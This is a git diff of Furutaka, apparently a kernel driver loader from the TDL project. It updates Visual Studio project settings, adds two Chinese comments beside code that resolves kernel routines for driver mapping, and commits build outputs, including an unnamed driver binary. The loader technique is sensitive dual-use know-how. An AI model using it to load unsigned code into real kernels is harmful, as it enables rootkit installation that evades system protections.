diff --git a/Source/Furutaka/Furutaka.vcxproj b/Source/Furutaka/Furutaka.vcxproj
index de1d48f..753e778 100644
--- a/Source/Furutaka/Furutaka.vcxproj
+++ b/Source/Furutaka/Furutaka.vcxproj
@@ -14,20 +14,20 @@
{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}
Win32Proj
Furutaka
- 10.0.17763.0
+ 10.0.19041.0
Furutaka
Application
true
- v141
+ v142
Unicode
Application
false
- v141
+ v142
Unicode
@@ -64,6 +64,7 @@
_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
CompileAsC
false
+ MultiThreadedDebug
Console
diff --git a/Source/Furutaka/main.c b/Source/Furutaka/main.c
index 71f1fe2..b4d67f3 100644
--- a/Source/Furutaka/main.c
+++ b/Source/Furutaka/main.c
@@ -386,7 +386,8 @@ UINT TDLMapDriver(
u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text));
cuiPrintText(text, TRUE);
}
-
+ //找ExAllocatePoolWithTag过后
+ //根据版本号
if (g_NtBuildNumber < 15063) {
RtlInitString(&routineName, "PsCreateSystemThread");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID*)&xPsCreateSystemThread);
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.exe b/Source/Furutaka/output/x64/Debug/Furutaka.exe
new file mode 100644
index 0000000..6b30c26
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/Furutaka.exe differ
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.exe.recipe b/Source/Furutaka/output/x64/Debug/Furutaka.exe.recipe
new file mode 100644
index 0000000..e090a3c
--- /dev/null
+++ b/Source/Furutaka/output/x64/Debug/Furutaka.exe.recipe
@@ -0,0 +1,11 @@
+
+
+
+
+ J:\Workspace\drivers\TDL\Source\Furutaka\output\x64\Debug\Furutaka.exe
+
+
+
+
+
+
\ No newline at end of file
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.ilk b/Source/Furutaka/output/x64/Debug/Furutaka.ilk
new file mode 100644
index 0000000..eb66f4d
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/Furutaka.ilk differ
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.log b/Source/Furutaka/output/x64/Debug/Furutaka.log
new file mode 100644
index 0000000..4c3f5c5
--- /dev/null
+++ b/Source/Furutaka/output/x64/Debug/Furutaka.log
@@ -0,0 +1,17 @@
+ cui.c
+ instdrv.c
+ main.c
+ cmdline.c
+ u64tohex.c
+ u64tostr.c
+ ultohex.c
+ ultostr.c
+ _strcat.c
+ _strcmpi.c
+ _strcpy.c
+ _strend.c
+ _strlen.c
+ _strncmpi.c
+ sup.c
+ 正在生成代码...
+ Furutaka.vcxproj -> J:\Workspace\drivers\TDL\Source\Furutaka\output\x64\Debug\Furutaka.exe
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.pdb b/Source/Furutaka/output/x64/Debug/Furutaka.pdb
new file mode 100644
index 0000000..57be3e5
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/Furutaka.pdb differ
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.tlog/CL.command.1.tlog b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..e2e196f
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/CL.command.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.tlog/CL.read.1.tlog b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..ffe7b5b
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/CL.read.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.tlog/CL.write.1.tlog b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..66facbd
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/CL.write.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.tlog/Furutaka.lastbuildstate b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/Furutaka.lastbuildstate
new file mode 100644
index 0000000..f69fe98
--- /dev/null
+++ b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/Furutaka.lastbuildstate
@@ -0,0 +1,2 @@
+PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.28.29333:TargetPlatformVersion=10.0.19041.0:
+Debug|x64|J:\Workspace\drivers\TDL\Source\Furutaka\|
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.tlog/link.command.1.tlog b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/link.command.1.tlog
new file mode 100644
index 0000000..01dc5d4
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/link.command.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.tlog/link.read.1.tlog b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/link.read.1.tlog
new file mode 100644
index 0000000..8e63e3b
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/link.read.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.tlog/link.write.1.tlog b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/link.write.1.tlog
new file mode 100644
index 0000000..6d7e9fc
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/link.write.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.tlog/rc.command.1.tlog b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/rc.command.1.tlog
new file mode 100644
index 0000000..d3ceca4
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/rc.command.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.tlog/rc.read.1.tlog b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/rc.read.1.tlog
new file mode 100644
index 0000000..4818fc6
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/rc.read.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.tlog/rc.write.1.tlog b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/rc.write.1.tlog
new file mode 100644
index 0000000..02b199e
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/Furutaka.tlog/rc.write.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Debug/Furutaka.vcxproj.FileListAbsolute.txt b/Source/Furutaka/output/x64/Debug/Furutaka.vcxproj.FileListAbsolute.txt
new file mode 100644
index 0000000..1de6ec7
--- /dev/null
+++ b/Source/Furutaka/output/x64/Debug/Furutaka.vcxproj.FileListAbsolute.txt
@@ -0,0 +1,2 @@
+J:\Workspace\drivers\TDL\Source\Furutaka\output\x64\Debug\Furutaka.exe
+J:\Workspace\drivers\TDL\Source\Furutaka\output\x64\Debug\Furutaka.pdb
diff --git a/Source/Furutaka/output/x64/Debug/_strcat.obj b/Source/Furutaka/output/x64/Debug/_strcat.obj
new file mode 100644
index 0000000..b374c33
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/_strcat.obj differ
diff --git a/Source/Furutaka/output/x64/Debug/_strcmpi.obj b/Source/Furutaka/output/x64/Debug/_strcmpi.obj
new file mode 100644
index 0000000..cc12f44
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/_strcmpi.obj differ
diff --git a/Source/Furutaka/output/x64/Debug/_strcpy.obj b/Source/Furutaka/output/x64/Debug/_strcpy.obj
new file mode 100644
index 0000000..17e13ca
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/_strcpy.obj differ
diff --git a/Source/Furutaka/output/x64/Debug/_strend.obj b/Source/Furutaka/output/x64/Debug/_strend.obj
new file mode 100644
index 0000000..3d20e8f
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/_strend.obj differ
diff --git a/Source/Furutaka/output/x64/Debug/_strlen.obj b/Source/Furutaka/output/x64/Debug/_strlen.obj
new file mode 100644
index 0000000..379a393
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/_strlen.obj differ
diff --git a/Source/Furutaka/output/x64/Debug/_strncmpi.obj b/Source/Furutaka/output/x64/Debug/_strncmpi.obj
new file mode 100644
index 0000000..3635810
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/_strncmpi.obj differ
diff --git a/Source/Furutaka/output/x64/Debug/cmdline.obj b/Source/Furutaka/output/x64/Debug/cmdline.obj
new file mode 100644
index 0000000..6481aec
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/cmdline.obj differ
diff --git a/Source/Furutaka/output/x64/Debug/cui.obj b/Source/Furutaka/output/x64/Debug/cui.obj
new file mode 100644
index 0000000..35b0c8c
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/cui.obj differ
diff --git a/Source/Furutaka/output/x64/Debug/hvppdrv.sys b/Source/Furutaka/output/x64/Debug/hvppdrv.sys
new file mode 100644
index 0000000..4fd270d
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/hvppdrv.sys differ
diff --git a/Source/Furutaka/output/x64/Debug/instdrv.obj b/Source/Furutaka/output/x64/Debug/instdrv.obj
new file mode 100644
index 0000000..efd2bbe
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/instdrv.obj differ
diff --git a/Source/Furutaka/output/x64/Debug/main.obj b/Source/Furutaka/output/x64/Debug/main.obj
new file mode 100644
index 0000000..6992e55
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/main.obj differ
diff --git a/Source/Furutaka/output/x64/Debug/resource.res b/Source/Furutaka/output/x64/Debug/resource.res
new file mode 100644
index 0000000..3d488a0
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/resource.res differ
diff --git a/Source/Furutaka/output/x64/Debug/sup.obj b/Source/Furutaka/output/x64/Debug/sup.obj
new file mode 100644
index 0000000..a602680
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/sup.obj differ
diff --git a/Source/Furutaka/output/x64/Debug/u64tohex.obj b/Source/Furutaka/output/x64/Debug/u64tohex.obj
new file mode 100644
index 0000000..5088652
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/u64tohex.obj differ
diff --git a/Source/Furutaka/output/x64/Debug/u64tostr.obj b/Source/Furutaka/output/x64/Debug/u64tostr.obj
new file mode 100644
index 0000000..7ba38e0
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/u64tostr.obj differ
diff --git a/Source/Furutaka/output/x64/Debug/ultohex.obj b/Source/Furutaka/output/x64/Debug/ultohex.obj
new file mode 100644
index 0000000..a77a1c4
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/ultohex.obj differ
diff --git a/Source/Furutaka/output/x64/Debug/ultostr.obj b/Source/Furutaka/output/x64/Debug/ultostr.obj
new file mode 100644
index 0000000..f5a8f4c
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/ultostr.obj differ
diff --git a/Source/Furutaka/output/x64/Debug/vc142.idb b/Source/Furutaka/output/x64/Debug/vc142.idb
new file mode 100644
index 0000000..63dd95f
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/vc142.idb differ
diff --git a/Source/Furutaka/output/x64/Debug/vc142.pdb b/Source/Furutaka/output/x64/Debug/vc142.pdb
new file mode 100644
index 0000000..fad0ff9
Binary files /dev/null and b/Source/Furutaka/output/x64/Debug/vc142.pdb differ
diff --git a/Source/Furutaka/output/x64/Release/Furutaka.exe b/Source/Furutaka/output/x64/Release/Furutaka.exe
new file mode 100644
index 0000000..f2f5b7e
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/Furutaka.exe differ
diff --git a/Source/Furutaka/output/x64/Release/Furutaka.exe.recipe b/Source/Furutaka/output/x64/Release/Furutaka.exe.recipe
new file mode 100644
index 0000000..d2609a0
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/Furutaka.exe.recipe
@@ -0,0 +1,11 @@
+
+
+
+
+ J:\Workspace\drivers\TDL\Source\Furutaka\output\x64\Release\Furutaka.exe
+
+
+
+
+
+
\ No newline at end of file
diff --git a/Source/Furutaka/output/x64/Release/Furutaka.log b/Source/Furutaka/output/x64/Release/Furutaka.log
new file mode 100644
index 0000000..37cc5f1
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/Furutaka.log
@@ -0,0 +1,125 @@
+ cui.c
+ instdrv.c
+ main.c
+ cmdline.c
+ u64tohex.c
+ u64tostr.c
+ ultohex.c
+ ultostr.c
+ _strcat.c
+ _strcmpi.c
+ _strcpy.c
+ _strend.c
+ _strlen.c
+ _strncmpi.c
+ sup.c
+ 正在搜索库
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\kernel32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\user32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\gdi32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\winspool.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\comdlg32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\advapi32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\shell32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\ole32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\oleaut32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\uuid.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\odbc32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\odbccp32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\ntdll.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\ucrt\x64\libucrt.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\libvcruntime.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\LIBCMT.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\OLDNAMES.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\kernel32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\user32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\gdi32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\winspool.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\comdlg32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\advapi32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\shell32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\ole32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\oleaut32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\uuid.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\odbc32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\odbccp32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\ntdll.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\ucrt\x64\libucrt.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\libvcruntime.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\LIBCMT.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\OLDNAMES.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\kernel32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\user32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\gdi32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\winspool.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\comdlg32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\advapi32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\shell32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\ole32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\oleaut32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\uuid.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\odbc32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\odbccp32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\ntdll.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\ucrt\x64\libucrt.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\libvcruntime.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\LIBCMT.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\OLDNAMES.lib:
+ 已完成库搜索
+ 正在搜索库
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\kernel32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\user32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\gdi32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\winspool.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\comdlg32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\advapi32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\shell32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\ole32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\oleaut32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\uuid.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\odbc32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\odbccp32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\ntdll.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\ucrt\x64\libucrt.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\libvcruntime.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\LIBCMT.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\OLDNAMES.lib:
+ 已完成库搜索
+ 正在搜索库
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\kernel32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\user32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\gdi32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\winspool.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\comdlg32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\advapi32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\shell32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\ole32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\oleaut32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\uuid.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\odbc32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\odbccp32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\ntdll.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\ucrt\x64\libucrt.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\libvcruntime.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\LIBCMT.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\OLDNAMES.lib:
+ 已完成库搜索
+ 正在搜索库
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\kernel32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\user32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\gdi32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\winspool.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\comdlg32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\advapi32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\shell32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\ole32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\oleaut32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\uuid.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\odbc32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\odbccp32.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\um\x64\ntdll.lib:
+ 正在搜索 C:\Program Files (x86)\Windows Kits\10\lib\10.0.19041.0\ucrt\x64\libucrt.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\libvcruntime.lib:
+ 正在搜索 C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29333\lib\x64\LIBCMT.lib:
+ 已完成库搜索
+ Furutaka.vcxproj -> J:\Workspace\drivers\TDL\Source\Furutaka\output\x64\Release\Furutaka.exe
diff --git a/Source/Furutaka/output/x64/Release/Furutaka.tlog/CL.11444.write.1.tlog b/Source/Furutaka/output/x64/Release/Furutaka.tlog/CL.11444.write.1.tlog
new file mode 100644
index 0000000..71336e1
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/Furutaka.tlog/CL.11444.write.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Release/Furutaka.tlog/CL.command.1.tlog b/Source/Furutaka/output/x64/Release/Furutaka.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..54bc458
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/Furutaka.tlog/CL.command.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Release/Furutaka.tlog/CL.read.1.tlog b/Source/Furutaka/output/x64/Release/Furutaka.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..08abc0c
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/Furutaka.tlog/CL.read.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Release/Furutaka.tlog/Furutaka.lastbuildstate b/Source/Furutaka/output/x64/Release/Furutaka.tlog/Furutaka.lastbuildstate
new file mode 100644
index 0000000..ea37f53
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/Furutaka.tlog/Furutaka.lastbuildstate
@@ -0,0 +1,2 @@
+PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.28.29333:TargetPlatformVersion=10.0.19041.0:
+Release|x64|J:\Workspace\drivers\TDL\Source\Furutaka\|
diff --git a/Source/Furutaka/output/x64/Release/Furutaka.tlog/link.command.1.tlog b/Source/Furutaka/output/x64/Release/Furutaka.tlog/link.command.1.tlog
new file mode 100644
index 0000000..708f932
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/Furutaka.tlog/link.command.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Release/Furutaka.tlog/link.read.1.tlog b/Source/Furutaka/output/x64/Release/Furutaka.tlog/link.read.1.tlog
new file mode 100644
index 0000000..8d1db5d
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/Furutaka.tlog/link.read.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Release/Furutaka.tlog/link.write.1.tlog b/Source/Furutaka/output/x64/Release/Furutaka.tlog/link.write.1.tlog
new file mode 100644
index 0000000..7fab1ee
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/Furutaka.tlog/link.write.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Release/Furutaka.tlog/rc.command.1.tlog b/Source/Furutaka/output/x64/Release/Furutaka.tlog/rc.command.1.tlog
new file mode 100644
index 0000000..29370c3
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/Furutaka.tlog/rc.command.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Release/Furutaka.tlog/rc.read.1.tlog b/Source/Furutaka/output/x64/Release/Furutaka.tlog/rc.read.1.tlog
new file mode 100644
index 0000000..4818fc6
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/Furutaka.tlog/rc.read.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Release/Furutaka.tlog/rc.write.1.tlog b/Source/Furutaka/output/x64/Release/Furutaka.tlog/rc.write.1.tlog
new file mode 100644
index 0000000..f33da6f
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/Furutaka.tlog/rc.write.1.tlog differ
diff --git a/Source/Furutaka/output/x64/Release/Furutaka.vcxproj.FileListAbsolute.txt b/Source/Furutaka/output/x64/Release/Furutaka.vcxproj.FileListAbsolute.txt
new file mode 100644
index 0000000..ceb5a6e
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/Furutaka.vcxproj.FileListAbsolute.txt
@@ -0,0 +1 @@
+J:\Workspace\drivers\TDL\Source\Furutaka\output\x64\Release\Furutaka.exe
diff --git a/Source/Furutaka/output/x64/Release/_strcat.obj b/Source/Furutaka/output/x64/Release/_strcat.obj
new file mode 100644
index 0000000..e12ee87
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/_strcat.obj differ
diff --git a/Source/Furutaka/output/x64/Release/_strcmpi.obj b/Source/Furutaka/output/x64/Release/_strcmpi.obj
new file mode 100644
index 0000000..55d3eb3
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/_strcmpi.obj differ
diff --git a/Source/Furutaka/output/x64/Release/_strcpy.obj b/Source/Furutaka/output/x64/Release/_strcpy.obj
new file mode 100644
index 0000000..fbe726e
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/_strcpy.obj differ
diff --git a/Source/Furutaka/output/x64/Release/_strend.obj b/Source/Furutaka/output/x64/Release/_strend.obj
new file mode 100644
index 0000000..bcacfd7
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/_strend.obj differ
diff --git a/Source/Furutaka/output/x64/Release/_strlen.obj b/Source/Furutaka/output/x64/Release/_strlen.obj
new file mode 100644
